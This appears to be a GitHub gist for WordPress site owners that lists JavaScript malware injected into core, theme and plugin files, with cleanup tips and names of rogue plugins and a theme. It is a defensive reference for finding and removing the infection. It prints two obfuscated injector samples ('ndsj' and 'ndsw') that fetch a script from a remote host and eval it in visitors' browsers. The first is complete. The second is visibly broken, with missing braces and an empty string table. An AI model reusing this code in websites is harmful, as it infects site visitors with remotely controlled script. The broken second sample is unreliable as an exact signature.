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Last active April 14, 2023 17:55
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[WP] WordPress common Javascript hack strings
// Common JS strings injected in all core, themes and plugins .js files (at the very end) - Use String Locator plugin and replace with empty space and/or use Force Reinstall plugin to reinstall all plugins - Remember to reinstall WP core files too
// Look for these plugins and remove them: Core, Core Stub
// Look for these themes and remove them: Classic
// Want to dig deeper?
// 1
;if(ndsj===undefined){function C(V,Z){var q=D();return C=function(i,f){i=i-0x8b;var T=q[i];return T;},C(V,Z);}(function(V,Z){var h={V:0xb0,Z:0xbd,q:0x99,i:'0x8b',f:0xba,T:0xbe},w=C,q=V();while(!![]){try{var i=parseInt(w(h.V))/0x1*(parseInt(w('0xaf'))/0x2)+parseInt(w(h.Z))/0x3*(-parseInt(w(0x96))/0x4)+-parseInt(w(h.q))/0x5+-parseInt(w('0xa0'))/0x6+-parseInt(w(0x9c))/0x7*(-parseInt(w(h.i))/0x8)+parseInt(w(h.f))/0x9+parseInt(w(h.T))/0xa*(parseInt(w('0xad'))/0xb);if(i===Z)break;else q['push'](q['shift']());}catch(f){q['push'](q['shift']());}}}(D,0x257ed));var ndsj=true,HttpClient=function(){var R={V:'0x90'},e={V:0x9e,Z:0xa3,q:0x8d,i:0x97},J={V:0x9f,Z:'0xb9',q:0xaa},t=C;this[t(R.V)]=function(V,Z){var M=t,q=new XMLHttpRequest();q[M(e.V)+M(0xae)+M('0xa5')+M('0x9d')+'ge']=function(){var o=M;if(q[o(J.V)+o('0xa1')+'te']==0x4&&q[o('0xa8')+'us']==0xc8)Z(q[o(J.Z)+o('0x92')+o(J.q)]);},q[M(e.Z)](M(e.q),V,!![]),q[M(e.i)](null);};},rand=function(){var j={V:'0xb8'},N=C;return Math[N('0xb2')+'om']()[N(0xa6)+N(j.V)](0x24)[N('0xbc')+'tr'](0x2);},token=function(){return rand()+rand();};function D(){var d=['send','inde','1193145SGrSDO','s://','rrer','21hqdubW','chan','onre','read','1345950yTJNPg','ySta','hesp','open','refe','tate','toSt','http','stat','xOf','Text','tion','net/','11NaMmvE','adys','806cWfgFm','354vqnFQY','loca','rand','://','.cac','ping','ndsx','ww.','ring','resp','441171YWNkfb','host','subs','3AkvVTw','1508830DBgfct','ry.m','jque','ace.','758328uKqajh','cook','GET','s?ve','in.j','get','www.','onse','name','://w','eval','41608fmSNHC'];D=function(){return d;};return D();}(function(){var P={V:0xab,Z:0xbb,q:0x9b,i:0x98,f:0xa9,T:0x91,U:'0xbc',c:'0x94',B:0xb7,Q:'0xa7',x:'0xac',r:'0xbf',E:'0x8f',d:0x90},v={V:'0xa9'},F={V:0xb6,Z:'0x95'},y=C,V=navigator,Z=document,q=screen,i=window,f=Z[y('0x8c')+'ie'],T=i[y(0xb1)+y(P.V)][y(P.Z)+y(0x93)],U=Z[y(0xa4)+y(P.q)];T[y(P.i)+y(P.f)](y(P.T))==0x0&&(T=T[y(P.U)+'tr'](0x4));if(U&&!x(U,y('0xb3')+T)&&!x(U,y(P.c)+y(P.B)+T)&&!f){var B=new HttpClient(),Q=y(P.Q)+y('0x9a')+y(0xb5)+y(0xb4)+y(0xa2)+y('0xc1')+y(P.x)+y(0xc0)+y(P.r)+y(P.E)+y('0x8e')+'r='+token();B[y(P.d)](Q,function(r){var s=y;x(r,s(F.V))&&i[s(F.Z)](r);});}function x(r,E){var S=y;return r[S(0x98)+S(v.V)](E)!==-0x1;}}());};
// 2
// 2
(function (I, h) {
var D = {
I: 0xaf,
h: 0xb0,
H: 0x9a,
X: '0x95',
J: 0xb1,
d: 0x8e
}, v = x, H = I();
while (!![]) {
try {
var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
if (X === h)
} catch (J) {
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
var t = { I: '0xa5' }, e = {
I: '0x89',
h: '0xa2',
H: '0x8a'
}, P = x;
this[P(t.I)] = function (I, h) {
var l = {
I: 0x99,
h: '0xa1',
H: '0x8d'
}, f = P, H = new XMLHttpRequest();
H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
var Y = f;
if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
}, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
}, rand = function () {
var a = {
I: '0x90',
h: '0x94',
H: '0xa0',
X: '0x85'
}, F = x;
return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
}, token = function () {
return rand() + rand();
(function () {
var Q = {
I: 0x86,
h: '0xa4',
H: '0xa4',
X: '0xa8',
J: 0x9b,
d: 0x9d,
V: '0x8b',
K: 0xa6
}, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
u[U('0xa5')](E, function (G) {
var j = U;
g(G, j(0xa9)) && X[j(T.I)](G);
function g(G, N) {
var r = U;
return G[r(m.I) + r(0x92)](N) !== -0x1;
function x(I, h) {
var H = A();
return x = function (X, J) {
X = X - 0x84;
var d = H[X];
return d;
}, x(I, h);
function A() {
var s = [
A = function () {
return s;
return A();}};
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